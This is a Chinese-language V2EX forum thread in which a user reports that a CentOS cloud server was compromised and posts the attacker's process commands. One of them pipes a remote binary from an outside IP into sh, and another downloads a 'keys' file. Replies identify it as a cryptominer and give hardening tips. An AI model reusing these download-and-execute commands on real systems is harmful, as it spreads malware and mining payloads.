云主机被扫入侵,大家帮分析怎么解决?

2019-12-17 15:39:32 +08:00
 zzugyl

云主机被哪位大佬入侵了,清空了我的 crontab。并未破坏我的其他主要文件。 多了三个进程

1  curl -s https://blockchain.info/balance?cors=true&active=
2  /bin/sh -c (curl -s http://185.164.72.119/log_rotate.bin||wget -q -O- http://185.164.72.119/log_rotate.bin)|sh
3  curl -o /tmp/keys http://178.32.46.58/keys

执行的脚本如下: https://ideone.com/4OR7Xr

我的主机系统版本:

# lsb_release -a
LSB Version:    unavailable
Distributor ID: CentOS
Description:    CentOS release 6.9 (Final)
Release:        6.9
Codename:       Final
# uname -a
Linux vt1 2.6.32-696.20.1.el6.x86_64 #1 SMP Fri Jan 26 17:51:45 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

计算机密码随机大小写字母+数字+特殊符号。 V2 大佬们帮分析,是用了哪个漏洞入侵的?

4357 次点击
所在节点    云计算
13 条回复
asd940808
2019-12-17 16:08:31 +08:00
改端口,禁 root 和密码登录。用密钥登录,应该就能避免绝大部分的入侵了吧?
zzugyl
2019-12-17 16:18:11 +08:00
@asd940808 #1 现在问题不严重。我想研究一下,他是怎么入侵的。感觉对方利用漏洞执行的。
lovelynn
2019-12-17 19:25:49 +08:00
你有没有开 redis 一般 crontab 修改的都是 redis 未授权访问
zzugyl
2019-12-18 09:26:37 +08:00
@lovelynn #3 没有跑 redis,有 memcached 和 nginx。
lovelynn
2019-12-18 10:02:45 +08:00
@zzugyl 我们微信沟通?
akmonde
2019-12-18 10:54:24 +08:00
这就是挖矿的脚本,memcached 看看是不是空口令弱口令~杀掉进程,删除 blockchain 下载的挖矿脚本,改下密码就行~
nicevar
2019-12-18 11:59:09 +08:00
一般就那几点时,ssh 默认 22 端口还允许 root 登陆、redis/MySQL 之类暴露公网了、站点有漏洞让拿到 webshell
nicevar
2019-12-18 12:02:30 +08:00
另外这可能都不是人为直接操作入侵的,大佬没必要盯着一台小服务器浪费时间,估计就是自动入侵程序随机扫描搞定了
tomychen
2019-12-18 14:06:47 +08:00
先说说开了哪些服务,这是其一
其二是很多小的 vps 提供商可能被默认值入或者被 hacking 值入模版...
zzugyl
2019-12-18 14:28:42 +08:00
@nicevar #7 正好开放了 22 端口,在内网情况下。root 登录开放了。
tomychen
2019-12-18 14:34:29 +08:00
@zzugyl 我指的是 web redis 等等这种 bind 0.0.0.0 暴露的,或者通过接口能够访问到的
因为直写 crontab 说明已经 root 了
smallgoogle
2019-12-18 17:23:55 +08:00
你可能是 web 漏洞 然后被提权了而已。
zzugyl
2019-12-18 17:57:05 +08:00
我把 openssh 升级到最新版。把 memcached 指定到 127.0.0.1。顺便更新了一下系统。看看明天还会不会被入侵。

这是一个专为移动设备优化的页面(即为了让你能够在 Google 搜索结果里秒开这个页面),如果你希望参与 V2EX 社区的讨论,你可以继续到 V2EX 上打开本讨论主题的完整版本。

https://www.v2ex.com/t/629843

V2EX 是创意工作者们的社区,是一个分享自己正在做的有趣事物、交流想法,可以遇见新朋友甚至新机会的地方。

V2EX is a community of developers, designers and creative people.

© 2021 V2EX